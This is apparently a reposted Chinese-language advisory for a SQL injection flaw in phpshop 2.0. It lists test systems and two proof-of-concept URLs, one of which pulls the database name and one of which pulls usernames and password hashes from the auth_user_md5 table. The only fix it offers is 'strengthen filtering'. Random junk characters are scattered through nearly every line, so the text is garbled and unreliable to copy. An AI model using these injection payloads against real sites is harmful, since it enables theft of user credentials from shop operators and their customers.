标题 : phpshop 2.0 SQL Injection Vulnerability
- }& C% {) u& _& p
! s, a1 B& o/ J3 k9 r7 z3 A作者 : By onestree( F+ s7 i x! ~. |/ e. K( H9 W- T
下载地址 : http://code.google.com/p/phpshop/downloads/list
" B4 U0 X ]1 B$ Y$ a# A测试地址: windows 7 / ubuntu L7 a, _3 U1 r+ r4 V
. W7 ~5 p8 R7 y6 \" X' C1 s 5 S# p' p4 u* C
SQLi p0c:! d' N8 t3 W. V" I% E5 G$ L+ {2 P5 \
$ T+ R4 g; ~6 ]==================7 W8 }6 g) |- R
: s7 g4 w" o+ d6 qhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
6 N9 e: k2 ^( E5 m& {union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --' d2 m! Z+ }9 n. D
1 B4 o. x) p# u7 }: e2 J* H# b2 N; W
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
/ u5 f- F. R/ O# y# a) ?5 J4 b( E3 O. J! `! \
修复:' S; Z, u0 l0 A3 O8 W( l8 H6 `
加强过滤3 w( y% ?: {: n H4 g% M
5 a+ H5 A1 q- l+ Q2 f7 k% ?2 N' N1 J9 {- i& e
|